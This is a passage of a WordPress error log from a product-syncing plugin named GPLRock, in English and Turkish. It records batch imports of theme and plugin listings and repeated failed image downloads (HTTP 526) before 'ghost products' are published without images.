UTC] GPLRock: Image download failed for product foodbook-automatic-order-invoice-printing-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:26:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/foodbook-automatic-order-invoice-printing-add-on-28378.webp for product foodbook-automatic-order-invoice-printing-add-on after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:26:57 UTC] GPLRock: Image download failed for product foodbook-automatic-order-invoice-printing-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:26:59 UTC] GPLRock: Image download failed for product foodbook-automatic-order-invoice-printing-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:27:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/foodbook-automatic-order-invoice-printing-add-on-28378.webp for product foodbook-automatic-order-invoice-printing-add-on after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:27:01 UTC] GPLRock WARNING: Image download failed for product foodbook-automatic-order-invoice-printing-add-on. URL: https://meldwp.com/wp-content/uploads/foodbook-automatic-order-invoice-printing-add-on-28378.webp [09-Mar-2026 01:27:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: foodbook-automatic-order-invoice-printing-add-on [09-Mar-2026 01:27:01 UTC] GPLRock: Image download failed for product smart-notification-popups-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:27:03 UTC] GPLRock: Image download failed for product smart-notification-popups-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:27:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/smart-notification-popups-for-woocommerce-24833.webp for product smart-notification-popups-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:27:07 UTC] GPLRock: Image download failed for product smart-notification-popups-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:27:09 UTC] GPLRock: Image download failed for product smart-notification-popups-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:27:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/smart-notification-popups-for-woocommerce-24833.webp for product smart-notification-popups-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:27:11 UTC] GPLRock WARNING: Image download failed for product smart-notification-popups-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/smart-notification-popups-for-woocommerce-24833.webp [09-Mar-2026 01:27:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: smart-notification-popups-for-woocommerce [09-Mar-2026 01:27:11 UTC] GPLRock API Sync: Batch başlıyor - Offset: 4200, Total: 1900/9737 [09-Mar-2026 01:27:12 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 01:27:13 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 01:27:15 UTC] GPLRock API Sync: Batch başlıyor - Offset: 4300, Total: 2000/9737 [09-Mar-2026 01:27:16 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 01:27:20 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 01:27:20 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [09-Mar-2026 01:27:20 UTC] GPLRock API Sync: Batch başlıyor - Offset: 4400, Total: 2100/9737 [09-Mar-2026 01:27:21 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 01:27:21 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 01:38:01 UTC] GPLRock API Sync: Batch başlıyor - Offset: 4500, Total: 2200/9737 [09-Mar-2026 01:38:02 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 01:38:03 UTC] GPLRock: Image downloaded successfully for product dash-creative-business-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8987c1ca.webp [09-Mar-2026 01:38:03 UTC] GPLRock: Using pre-downloaded image for product dash-creative-business-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8987c1ca.webp [09-Mar-2026 01:38:03 UTC] GPLRock: Ghost product published with image - Product ID: dash-creative-business-theme [09-Mar-2026 01:38:03 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 01:38:03 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [09-Mar-2026 01:38:03 UTC] GPLRock API Sync: Batch başlıyor - Offset: 4600, Total: 2300/9737 [09-Mar-2026 01:38:03 UTC] GPLRock: Image download failed for product cryptoking-bitcoin-ico-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:38:04 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 01:38:05 UTC] GPLRock: Image download failed for product cryptoking-bitcoin-ico-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:38:06 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 01:38:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cryptoking---bitcoin--ico-theme-31213.webp for product cryptoking-bitcoin-ico-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:38:07 UTC] GPLRock: Image download failed for product cryptoking-bitcoin-ico-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:38:09 UTC] GPLRock: Image download failed for product cryptoking-bitcoin-ico-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:38:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cryptoking---bitcoin--ico-theme-31213.webp for product cryptoking-bitcoin-ico-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:38:11 UTC] GPLRock WARNING: Image download failed for product cryptoking-bitcoin-ico-theme. URL: https://meldwp.com/wp-content/uploads/cryptoking---bitcoin--ico-theme-31213.webp [09-Mar-2026 01:38:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cryptoking-bitcoin-ico-theme [09-Mar-2026 01:38:13 UTC] GPLRock: Image download failed for product easto-single-property-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:38:16 UTC] GPLRock: Image download failed for product easto-single-property-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:38:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/easto---single-property-theme-14494.webp for product easto-single-property-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:38:19 UTC] GPLRock: Image download failed for product easto-single-property-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:38:21 UTC] GPLRock: Image download failed for product easto-single-property-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:38:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/easto---single-property-theme-14494.webp for product easto-single-property-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:38:23 UTC] GPLRock WARNING: Image download failed for product easto-single-property-theme. URL: https://meldwp.com/wp-content/uploads/easto---single-property-theme-14494.webp [09-Mar-2026 01:38:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: easto-single-property-theme [09-Mar-2026 01:38:24 UTC] GPLRock: Image downloaded successfully for product gamezone-video-gaming-blog-esports-store-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f3821d0b.webp [09-Mar-2026 01:38:24 UTC] GPLRock: Using pre-downloaded image for product gamezone-video-gaming-blog-esports-store-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f3821d0b.webp [09-Mar-2026 01:38:24 UTC] GPLRock: Ghost product published with image - Product ID: gamezone-video-gaming-blog-esports-store-wordpress-theme [09-Mar-2026 01:38:24 UTC] GPLRock: Image download failed for product trikon-multipurpose-furniture-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:38:26 UTC] GPLRock: Image download failed for product trikon-multipurpose-furniture-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:38:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/trikon---multipurpose-furniture-woocommerce-theme-6618.webp for product trikon-multipurpose-furniture-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:38:28 UTC] GPLRock: Image download failed for product trikon-multipurpose-furniture-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:38:30 UTC] GPLRock: Image download failed for product trikon-multipurpose-furniture-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:38:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/trikon---multipurpose-furniture-woocommerce-theme-6618.webp for product trikon-multipurpose-furniture-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:38:33 UTC] GPLRock WARNING: Image download failed for product trikon-multipurpose-furniture-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/trikon---multipurpose-furniture-woocommerce-theme-6618.webp [09-Mar-2026 01:38:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: trikon-multipurpose-furniture-woocommerce-theme [09-Mar-2026 01:38:33 UTC] GPLRock: Image download failed for product helmets-wordpress-theme-for-handyman (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:38:35 UTC] GPLRock: Image download failed for product helmets-wordpress-theme-for-handyman (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:38:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/helmets---wordpress-theme-for-handyman-2610.webp for product helmets-wordpress-theme-for-handyman after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:38:37 UTC] GPLRock: Image download failed for product helmets-wordpress-theme-for-handyman (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:38:39 UTC] GPLRock: Image download failed for product helmets-wordpress-theme-for-handyman (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:38:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/helmets---wordpress-theme-for-handyman-2610.webp for product helmets-wordpress-theme-for-handyman after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:38:41 UTC] GPLRock WARNING: Image download failed for product helmets-wordpress-theme-for-handyman. URL: https://meldwp.com/wp-content/uploads/helmets---wordpress-theme-for-handyman-2610.webp [09-Mar-2026 01:38:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: helmets-wordpress-theme-for-handyman [09-Mar-2026 01:38:43 UTC] GPLRock: Image downloaded successfully for product multipurpose-responsive-html5-website-template (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1d162355.webp [09-Mar-2026 01:38:43 UTC] GPLRock: Using pre-downloaded image for product multipurpose-responsive-html5-website-template: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1d162355.webp [09-Mar-2026 01:38:43 UTC] GPLRock: Ghost product published with image - Product ID: multipurpose-responsive-html5-website-template [09-Mar-2026 01:38:43 UTC] GPLRock: Image download failed for product elletta-blog-news-calendar-shop-theme-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:38:45 UTC] GPLRock: Image download failed for product elletta-blog-news-calendar-shop-theme-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:38:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elletta---blog-news-calendar--shop-theme-wordpress-11437.webp for product elletta-blog-news-calendar-shop-theme-wordpress after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:38:47 UTC] GPLRock: Image download failed for product elletta-blog-news-calendar-shop-theme-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:38:49 UTC] GPLRock: Image download failed for product elletta-blog-news-calendar-shop-theme-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:38:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elletta---blog-news-calendar--shop-theme-wordpress-11437.webp for product elletta-blog-news-calendar-shop-theme-wordpress after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:38:51 UTC] GPLRock WARNING: Image download failed for product elletta-blog-news-calendar-shop-theme-wordpress. URL: https://meldwp.com/wp-content/uploads/elletta---blog-news-calendar--shop-theme-wordpress-11437.webp [09-Mar-2026 01:38:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: elletta-blog-news-calendar-shop-theme-wordpress [09-Mar-2026 01:38:52 UTC] GPLRock: Image download failed for product oceania-yacht-club-and-boat-rental-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:38:54 UTC] GPLRock: Image download failed for product oceania-yacht-club-and-boat-rental-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:38:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oceania---yacht-club-and-boat-rental-wordpress-theme-18429.webp for product oceania-yacht-club-and-boat-rental-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:38:56 UTC] GPLRock: Image download failed for product oceania-yacht-club-and-boat-rental-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:38:58 UTC] GPLRock: Image download failed for product oceania-yacht-club-and-boat-rental-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:39:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oceania---yacht-club-and-boat-rental-wordpress-theme-18429.webp for product oceania-yacht-club-and-boat-rental-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:39:00 UTC] GPLRock WARNING: Image download failed for product oceania-yacht-club-and-boat-rental-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/oceania---yacht-club-and-boat-rental-wordpress-theme-18429.webp [09-Mar-2026 01:39:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: oceania-yacht-club-and-boat-rental-wordpress-theme [09-Mar-2026 01:39:03 UTC] GPLRock API Sync: Batch başlıyor - Offset: 4700, Total: 2400/9737 [09-Mar-2026 01:39:04 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 01:39:04 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 01:39:05 UTC] GPLRock API Sync: Batch başlıyor - Offset: 4800, Total: 2500/9737 [09-Mar-2026 01:39:06 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 01:39:08 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 01:39:08 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [09-Mar-2026 01:39:08 UTC] GPLRock API Sync: Batch başlıyor - Offset: 4900, Total: 2600/9737 [09-Mar-2026 01:39:09 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 01:39:14 UTC] GPLRock API Sync: Batch zaten çalışıyor, skip [09-Mar-2026 01:39:14 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 01:39:18 UTC] GPLRock API Sync: Batch başlıyor - Offset: 5000, Total: 2700/9737 [09-Mar-2026 01:39:20 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 01:39:20 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 05:50:44 UTC] GPLRock: Image downloaded successfully for product malta-windsurfing-kitesurfing-wakesurfing-center-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fe938593.webp [09-Mar-2026 05:50:44 UTC] GPLRock: Using pre-downloaded image for product malta-windsurfing-kitesurfing-wakesurfing-center-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fe938593.webp [09-Mar-2026 05:50:44 UTC] GPLRock: Ghost product published with image - Product ID: malta-windsurfing-kitesurfing-wakesurfing-center-wordpress-theme [09-Mar-2026 05:50:44 UTC] GPLRock: Image downloaded successfully for product smarthr-html-vue-3-angular-19-node-hr-project-management-crm-admin-dashboard-template (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ff8e8ebc.webp [09-Mar-2026 05:50:44 UTC] GPLRock: Using pre-downloaded image for product smarthr-html-vue-3-angular-19-node-hr-project-management-crm-admin-dashboard-template: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ff8e8ebc.webp [09-Mar-2026 05:50:44 UTC] GPLRock: Ghost product published with image - Product ID: smarthr-html-vue-3-angular-19-node-hr-project-management-crm-admin-dashboard-template [09-Mar-2026 05:50:44 UTC] GPLRock: Image downloaded successfully for product superowly-kids-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b94c6150.webp [09-Mar-2026 05:50:44 UTC] GPLRock: Using pre-downloaded image for product superowly-kids-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b94c6150.webp [09-Mar-2026 05:50:44 UTC] GPLRock: Ghost product published with image - Product ID: superowly-kids-wordpress-theme [09-Mar-2026 05:50:44 UTC] GPLRock: Image downloaded successfully for product agrofields-food-shop-grocery-market-wp-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6dc2ec83.webp [09-Mar-2026 05:50:44 UTC] GPLRock: Using pre-downloaded image for product agrofields-food-shop-grocery-market-wp-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6dc2ec83.webp [09-Mar-2026 05:50:44 UTC] GPLRock: Ghost product published with image - Product ID: agrofields-food-shop-grocery-market-wp-theme [09-Mar-2026 05:50:44 UTC] GPLRock: Image download failed for product fitben-gym-fitness-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 05:50:46 UTC] GPLRock: Image download failed for product fitben-gym-fitness-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 05:50:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fitben---gym-fitness-wordpress-theme-26614.webp for product fitben-gym-fitness-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 05:50:49 UTC] GPLRock: Image download failed for product fitben-gym-fitness-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 05:50:51 UTC] GPLRock: Image download failed for product fitben-gym-fitness-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 05:50:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fitben---gym-fitness-wordpress-theme-26614.webp for product fitben-gym-fitness-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 05:50:53 UTC] GPLRock WARNING: Image download failed for product fitben-gym-fitness-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fitben---gym-fitness-wordpress-theme-26614.webp [09-Mar-2026 05:50:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fitben-gym-fitness-wordpress-theme [09-Mar-2026 05:50:53 UTC] GPLRock: Image download failed for product muse-music-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 05:50:56 UTC] GPLRock: Image download failed for product muse-music-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 05:50:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/muse--music-wordpress-theme-15991.webp for product muse-music-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 05:50:58 UTC] GPLRock: Image download failed for product muse-music-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 05:51:00 UTC] GPLRock: Image download failed for product muse-music-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 05:51:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/muse--music-wordpress-theme-15991.webp for product muse-music-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 05:51:02 UTC] GPLRock WARNING: Image download failed for product muse-music-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/muse--music-wordpress-theme-15991.webp [09-Mar-2026 05:51:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: muse-music-wordpress-theme [09-Mar-2026 05:51:02 UTC] GPLRock: Image download failed for product glownis-beauty-and-cosmetics-shop-wordpress-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 05:51:04 UTC] GPLRock: Image download failed for product glownis-beauty-and-cosmetics-shop-wordpress-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 05:51:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/glownis---beauty-and-cosmetics-shop-wordpress-woocommerce-theme-3216.webp for product glownis-beauty-and-cosmetics-shop-wordpress-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 05:51:07 UTC] GPLRock: Image download failed for product glownis-beauty-and-cosmetics-shop-wordpress-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 05:51:09 UTC] GPLRock: Image download failed for product glownis-beauty-and-cosmetics-shop-wordpress-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 05:51:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/glownis---beauty-and-cosmetics-shop-wordpress-woocommerce-theme-3216.webp for product glownis-beauty-and-cosmetics-shop-wordpress-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 05:51:11 UTC] GPLRock WARNING: Image download failed for product glownis-beauty-and-cosmetics-shop-wordpress-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/glownis---beauty-and-cosmetics-shop-wordpress-woocommerce-theme-3216.webp [09-Mar-2026 05:51:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: glownis-beauty-and-cosmetics-shop-wordpress-woocommerce-theme [09-Mar-2026 05:51:11 UTC] GPLRock: Image download failed for product serity-cctv-and-security-cameras-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 05:51:13 UTC] GPLRock: Image download failed for product serity-cctv-and-security-cameras-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 05:51:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/serity---cctv-and-security-cameras-wordpress-theme-25235.webp for product serity-cctv-and-security-cameras-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 05:51:16 UTC] GPLRock: Image download failed for product serity-cctv-and-security-cameras-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 05:51:18 UTC] GPLRock: Image download failed for product serity-cctv-and-security-cameras-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 05:51:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/serity---cctv-and-security-cameras-wordpress-theme-25235.webp for product serity-cctv-and-security-cameras-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 05:51:20 UTC] GPLRock WARNING: Image download failed for product serity-cctv-and-security-cameras-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/serity---cctv-and-security-cameras-wordpress-theme-25235.webp [09-Mar-2026 05:51:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: serity-cctv-and-security-cameras-wordpress-theme [09-Mar-2026 05:51:20 UTC] GPLRock: Image download failed for product alva-wordpress-theme-for-saas-product (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 05:51:22 UTC] GPLRock: Image download failed for product alva-wordpress-theme-for-saas-product (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 05:51:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alva--wordpress-theme-for-saas-product-15826.webp for product alva-wordpress-theme-for-saas-product after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 05:51:24 UTC] GPLRock: Image download failed for product alva-wordpress-theme-for-saas-product (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 05:51:26 UTC] GPLRock: Image download failed for product alva-wordpress-theme-for-saas-product (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 05:51:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alva--wordpress-theme-for-saas-product-15826.webp for product alva-wordpress-theme-for-saas-product after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 05:51:28 UTC] GPLRock WARNING: Image download failed for product alva-wordpress-theme-for-saas-product. URL: https://meldwp.com/wp-content/uploads/alva--wordpress-theme-for-saas-product-15826.webp [09-Mar-2026 05:51:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: alva-wordpress-theme-for-saas-product [09-Mar-2026 05:51:28 UTC] GPLRock: Image download failed for product allied-health-care-health-and-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 05:51:31 UTC] GPLRock: Image download failed for product allied-health-care-health-and-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 05:51:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/allied-health-care---health-and-medical-wordpress-theme-8198.webp for product allied-health-care-health-and-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 05:51:33 UTC] GPLRock: Image download failed for product allied-health-care-health-and-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 05:51:35 UTC] GPLRock: Image download failed for product allied-health-care-health-and-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 05:51:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/allied-health-care---health-and-medical-wordpress-theme-8198.webp for product allied-health-care-health-and-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 05:51:37 UTC] GPLRock WARNING: Image download failed for product allied-health-care-health-and-medical-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/allied-health-care---health-and-medical-wordpress-theme-8198.webp [09-Mar-2026 05:51:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: allied-health-care-health-and-medical-wordpress-theme [09-Mar-2026 05:51:37 UTC] GPLRock API Sync: Batch başlıyor - Offset: 5100, Total: 2800/9737 [09-Mar-2026 05:51:38 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 05:51:38 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 05:51:39 UTC] GPLRock API Sync: Batch başlıyor - Offset: 5200, Total: 2900/9737 [09-Mar-2026 05:51:40 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 05:51:40 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 05:51:40 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [09-Mar-2026 05:51:40 UTC] GPLRock API Sync: Batch başlıyor - Offset: 5300, Total: 3000/9737 [09-Mar-2026 05:51:41 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 05:51:42 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 05:51:43 UTC] GPLRock: Image downloaded successfully for product wpforms-surveys-and-polls (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5ec006a9.jpg [09-Mar-2026 05:51:43 UTC] GPLRock: Using pre-downloaded image for product wpforms-surveys-and-polls: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5ec006a9.jpg [09-Mar-2026 05:51:43 UTC] GPLRock: Ghost product published with image - Product ID: wpforms-surveys-and-polls [09-Mar-2026 05:51:45 UTC] GPLRock: Image downloaded successfully for product wpforms-paypal-standard (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-35173818.jpg [09-Mar-2026 05:51:45 UTC] GPLRock: Using 